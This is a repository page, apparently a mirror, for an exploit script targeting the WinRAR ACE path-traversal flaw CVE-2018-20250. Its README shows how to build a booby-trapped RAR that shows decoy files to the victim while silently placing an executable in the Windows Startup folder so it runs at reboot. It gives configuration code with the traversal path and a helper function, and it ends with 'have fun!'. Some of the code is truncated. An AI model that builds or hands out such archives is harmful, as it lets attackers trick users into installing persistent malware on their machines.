Watch 1 Star 0 Fork 0

soapffz / CVE-2018-20250

Join us
Explore and code with more than 2 million developers,Free private repositories !:)
Sign up
This repository doesn't specify license. Without author's permission, this code is only for learning and cannot be used for other purposes.
Nothing here. spread retract

Clone or download 1.97 KB
Copy Edit Web IDE Raw Blame History
WyAtu authored 2019-02-22 13:02 . Update

exp for Extracting Code Execution From Winrar

poc by Ridter

how to use ?

you just need to install python 3.7, and prepare a evil file you want to run, set the values you want, this exp script will generate the evil archive file automatically!

  1. set the values you want
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 --headers %s'%(filename))
    res =
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...
  1. run the exp, exp generated the test.rar automatically

  1. if the victim opens the test.rar, he will see the file hello.txt and world.txt, you can also add more files, more attractive files.

  1. when he unpacks the file, the victim's user startup directory will have one more file named hi.exe, actually it's a calc.exe. when he restart the computer, the hi.exe will run.

have fun! :)

Comment ( 0 )

Sign in for post a comment


Help Search